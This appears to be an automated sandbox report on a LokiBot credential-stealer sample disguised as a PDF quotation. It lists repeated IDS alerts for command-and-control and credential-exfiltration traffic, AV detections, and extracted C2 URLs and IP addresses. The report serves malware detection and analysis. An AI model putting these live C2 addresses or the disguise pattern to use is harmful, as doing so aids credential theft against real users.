                    2025-01-07T12:32:13.932697+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                    2025-01-07T12:32:14.805465+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                    2025-01-07T12:32:15.769592+010028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
                    2025-01-07T12:32:16.694494+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                    2025-01-07T12:32:17.621099+010028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
                    2025-01-07T12:32:18.524599+010028257661Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                    2025-01-07T12:32:19.413561+010028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                    2025-01-07T12:32:20.319720+010028257661Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
                    2025-01-07T12:32:21.208840+010028257661Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                    2025-01-07T12:32:22.190721+010028257661Malware Command and Control Activity Detected192.168.2.44976594.156.177.4180TCP
                    2025-01-07T12:32:23.083462+010028257661Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                    2025-01-07T12:32:23.973870+010028257661Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                    2025-01-07T12:32:24.880636+010028257661Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                    2025-01-07T12:32:25.829746+010028257661Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                    2025-01-07T12:32:26.723358+010028257661Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                    2025-01-07T12:32:27.582510+010028257661Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                    2025-01-07T12:32:28.619054+010028257661Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                    2025-01-07T12:32:29.504390+010028257661Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                    2025-01-07T12:32:30.382420+010028257661Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                    2025-01-07T12:32:31.256603+010028257661Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                    2025-01-07T12:32:32.155614+010028257661Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                    2025-01-07T12:32:33.032901+010028257661Malware Command and Control Activity Detected192.168.2.44977794.156.177.4180TCP
                    2025-01-07T12:32:33.924411+010028257661Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                    2025-01-07T12:32:34.814297+010028257661Malware Command and Control Activity Detected192.168.2.44977994.156.177.4180TCP
                    2025-01-07T12:32:35.704114+010028257661Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                    2025-01-07T12:32:36.588546+010028257661Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
                    2025-01-07T12:32:37.473584+010028257661Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
                    2025-01-07T12:32:38.360546+010028257661Malware Command and Control Activity Detected192.168.2.44978394.156.177.4180TCP
                    2025-01-07T12:32:39.253004+010028257661Malware Command and Control Activity Detected192.168.2.44978494.156.177.4180TCP
                    2025-01-07T12:32:40.116039+010028257661Malware Command and Control Activity Detected192.168.2.44978594.156.177.4180TCP
                    2025-01-07T12:32:40.987508+010028257661Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                    2025-01-07T12:32:41.861754+010028257661Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
                    2025-01-07T12:32:42.736881+010028257661Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
                    2025-01-07T12:32:43.630025+010028257661Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
                    2025-01-07T12:32:44.529692+010028257661Malware Command and Control Activity Detected192.168.2.44979094.156.177.4180TCP
                    2025-01-07T12:32:45.411818+010028257661Malware Command and Control Activity Detected192.168.2.44979194.156.177.4180TCP
                    2025-01-07T12:32:46.293457+010028257661Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                    2025-01-07T12:32:47.179130+010028257661Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                    2025-01-07T12:32:48.074620+010028257661Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
                    2025-01-07T12:32:48.984690+010028257661Malware Command and Control Activity Detected192.168.2.44979594.156.177.4180TCP
                    2025-01-07T12:32:49.862472+010028257661Malware Command and Control Activity Detected192.168.2.44979694.156.177.4180TCP
                    2025-01-07T12:32:50.758629+010028257661Malware Command and Control Activity Detected192.168.2.44979894.156.177.4180TCP
                    2025-01-07T12:32:51.655150+010028257661Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                    2025-01-07T12:32:52.567085+010028257661Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
                    2025-01-07T12:32:53.479625+010028257661Malware Command and Control Activity Detected192.168.2.44980194.156.177.4180TCP
                    2025-01-07T12:32:54.584481+010028257661Malware Command and Control Activity Detected192.168.2.44980394.156.177.4180TCP
                    2025-01-07T12:32:55.446641+010028257661Malware Command and Control Activity Detected192.168.2.44980494.156.177.4180TCP
                    2025-01-07T12:32:56.333834+010028257661Malware Command and Control Activity Detected192.168.2.44981094.156.177.4180TCP
                    2025-01-07T12:32:57.237309+010028257661Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                    2025-01-07T12:32:58.121179+010028257661Malware Command and Control Activity Detected192.168.2.44982294.156.177.4180TCP
                    2025-01-07T12:32:59.003527+010028257661Malware Command and Control Activity Detected192.168.2.44982894.156.177.4180TCP
                    2025-01-07T12:32:59.878899+010028257661Malware Command and Control Activity Detected192.168.2.44983794.156.177.4180TCP
                    2025-01-07T12:33:00.752916+010028257661Malware Command and Control Activity Detected192.168.2.44984394.156.177.4180TCP
                    2025-01-07T12:33:01.662274+010028257661Malware Command and Control Activity Detected192.168.2.44984994.156.177.4180TCP
                    2025-01-07T12:33:02.549471+010028257661Malware Command and Control Activity Detected192.168.2.44985794.156.177.4180TCP
                    2025-01-07T12:33:03.476176+010028257661Malware Command and Control Activity Detected192.168.2.44986394.156.177.4180TCP
                    2025-01-07T12:33:04.420628+010028257661Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
                    2025-01-07T12:33:05.289917+010028257661Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                    2025-01-07T12:33:06.157706+010028257661Malware Command and Control Activity Detected192.168.2.44988294.156.177.4180TCP
                    2025-01-07T12:33:07.168337+010028257661Malware Command and Control Activity Detected192.168.2.44988894.156.177.4180TCP
                    2025-01-07T12:33:08.065316+010028257661Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
                    2025-01-07T12:33:08.983613+010028257661Malware Command and Control Activity Detected192.168.2.44990494.156.177.4180TCP
                    2025-01-07T12:33:10.036766+010028257661Malware Command and Control Activity Detected192.168.2.44991094.156.177.4180TCP
                    2025-01-07T12:33:10.925247+010028257661Malware Command and Control Activity Detected192.168.2.44991894.156.177.4180TCP
                    2025-01-07T12:33:11.841098+010028257661Malware Command and Control Activity Detected192.168.2.44992794.156.177.4180TCP
                    2025-01-07T12:33:12.953872+010028257661Malware Command and Control Activity Detected192.168.2.44993394.156.177.4180TCP
                    2025-01-07T12:33:13.973579+010028257661Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                    2025-01-07T12:33:14.849018+010028257661Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                    2025-01-07T12:33:15.804831+010028257661Malware Command and Control Activity Detected192.168.2.44995694.156.177.4180TCP
                    2025-01-07T12:33:16.682925+010028257661Malware Command and Control Activity Detected192.168.2.44996294.156.177.4180TCP
                    2025-01-07T12:33:17.566164+010028257661Malware Command and Control Activity Detected192.168.2.44996894.156.177.4180TCP
                    2025-01-07T12:33:18.615544+010028257661Malware Command and Control Activity Detected192.168.2.44997494.156.177.4180TCP
                    2025-01-07T12:33:19.538604+010028257661Malware Command and Control Activity Detected192.168.2.44998594.156.177.4180TCP
                    2025-01-07T12:33:20.414906+010028257661Malware Command and Control Activity Detected192.168.2.44999194.156.177.4180TCP
                    2025-01-07T12:33:21.330905+010028257661Malware Command and Control Activity Detected192.168.2.44999794.156.177.4180TCP
                    2025-01-07T12:33:22.254058+010028257661Malware Command and Control Activity Detected192.168.2.45000394.156.177.4180TCP
                    2025-01-07T12:33:23.161672+010028257661Malware Command and Control Activity Detected192.168.2.45001094.156.177.4180TCP
                    2025-01-07T12:33:24.052352+010028257661Malware Command and Control Activity Detected192.168.2.45001994.156.177.4180TCP
                    2025-01-07T12:33:24.970591+010028257661Malware Command and Control Activity Detected192.168.2.45002694.156.177.4180TCP
                    2025-01-07T12:33:25.885204+010028257661Malware Command and Control Activity Detected192.168.2.45003294.156.177.4180TCP
                    2025-01-07T12:33:26.771343+010028257661Malware Command and Control Activity Detected192.168.2.45003894.156.177.4180TCP
                    2025-01-07T12:33:27.680964+010028257661Malware Command and Control Activity Detected192.168.2.45004594.156.177.4180TCP
                    2025-01-07T12:33:28.568840+010028257661Malware Command and Control Activity Detected192.168.2.45005494.156.177.4180TCP
                    2025-01-07T12:33:29.482591+010028257661Malware Command and Control Activity Detected192.168.2.45006094.156.177.4180TCP
                    2025-01-07T12:33:30.418199+010028257661Malware Command and Control Activity Detected192.168.2.45006794.156.177.4180TCP
                    2025-01-07T12:33:31.283218+010028257661Malware Command and Control Activity Detected192.168.2.45007394.156.177.4180TCP
                    2025-01-07T12:33:32.183439+010028257661Malware Command and Control Activity Detected192.168.2.45007994.156.177.4180TCP
                    2025-01-07T12:33:33.064766+010028257661Malware Command and Control Activity Detected192.168.2.45008694.156.177.4180TCP
                    2025-01-07T12:33:33.993234+010028257661Malware Command and Control Activity Detected192.168.2.45009494.156.177.4180TCP
                    2025-01-07T12:33:34.894254+010028257661Malware Command and Control Activity Detected192.168.2.45010094.156.177.4180TCP
                    2025-01-07T12:33:35.815203+010028257661Malware Command and Control Activity Detected192.168.2.45010694.156.177.4180TCP
                    2025-01-07T12:33:36.704614+010028257661Malware Command and Control Activity Detected192.168.2.45011294.156.177.4180TCP
                    2025-01-07T12:33:37.618568+010028257661Malware Command and Control Activity Detected192.168.2.45011494.156.177.4180TCP
                    2025-01-07T12:33:38.510581+010028257661Malware Command and Control Activity Detected192.168.2.45011594.156.177.4180TCP
                    2025-01-07T12:33:39.427169+010028257661Malware Command and Control Activity Detected192.168.2.45011694.156.177.4180TCP
                    2025-01-07T12:33:40.300156+010028257661Malware Command and Control Activity Detected192.168.2.45011794.156.177.4180TCP
                    2025-01-07T12:33:41.178680+010028257661Malware Command and Control Activity Detected192.168.2.45011894.156.177.4180TCP
                    2025-01-07T12:33:42.221421+010028257661Malware Command and Control Activity Detected192.168.2.45011994.156.177.4180TCP
                    2025-01-07T12:33:43.104720+010028257661Malware Command and Control Activity Detected192.168.2.45012094.156.177.4180TCP
                    2025-01-07T12:33:44.073014+010028257661Malware Command and Control Activity Detected192.168.2.45012194.156.177.4180TCP
                    2025-01-07T12:33:44.978438+010028257661Malware Command and Control Activity Detected192.168.2.45012294.156.177.4180TCP
                    2025-01-07T12:33:45.848723+010028257661Malware Command and Control Activity Detected192.168.2.45012394.156.177.4180TCP
                    2025-01-07T12:33:46.736292+010028257661Malware Command and Control Activity Detected192.168.2.45012494.156.177.4180TCP
                    2025-01-07T12:33:47.784973+010028257661Malware Command and Control Activity Detected192.168.2.45012594.156.177.4180TCP
                    2025-01-07T12:33:48.642095+010028257661Malware Command and Control Activity Detected192.168.2.45012694.156.177.4180TCP
                    2025-01-07T12:33:49.553437+010028257661Malware Command and Control Activity Detected192.168.2.45012794.156.177.4180TCP
                    2025-01-07T12:33:50.465759+010028257661Malware Command and Control Activity Detected192.168.2.45012894.156.177.4180TCP
                    2025-01-07T12:33:51.347194+010028257661Malware Command and Control Activity Detected192.168.2.45012994.156.177.4180TCP
                    2025-01-07T12:33:52.222675+010028257661Malware Command and Control Activity Detected192.168.2.45013094.156.177.4180TCP
                    2025-01-07T12:33:53.621252+010028257661Malware Command and Control Activity Detected192.168.2.45013194.156.177.4180TCP
                    2025-01-07T12:33:54.519173+010028257661Malware Command and Control Activity Detected192.168.2.45013294.156.177.4180TCP
                    2025-01-07T12:33:55.412870+010028257661Malware Command and Control Activity Detected192.168.2.45013394.156.177.4180TCP
                    2025-01-07T12:33:56.462921+010028257661Malware Command and Control Activity Detected192.168.2.45013494.156.177.4180TCP
                    2025-01-07T12:33:57.340598+010028257661Malware Command and Control Activity Detected192.168.2.45013594.156.177.4180TCP
                    2025-01-07T12:33:58.239632+010028257661Malware Command and Control Activity Detected192.168.2.45013694.156.177.4180TCP
                    2025-01-07T12:33:59.128389+010028257661Malware Command and Control Activity Detected192.168.2.45013794.156.177.4180TCP
                    2025-01-07T12:33:59.979403+010028257661Malware Command and Control Activity Detected192.168.2.45013894.156.177.4180TCP
                    2025-01-07T12:34:01.024157+010028257661Malware Command and Control Activity Detected192.168.2.45013994.156.177.4180TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://94.156.177.41/mars/five/fre.phpAvira URL Cloud: Label: malware
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeReversingLabs: Detection: 23%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeJoe Sandbox ML: detected
                    Source: Quotation2025-0107pdf.exeJoe Sandbox ML: detected

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeUnpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack
                    Source: Quotation2025-0107pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Quotation2025-0107pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_0305C36C
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_0305DE68
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_023FC36C
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_023FDE68

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49810 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49810 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49810 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49737 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49791 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49791 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49791 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
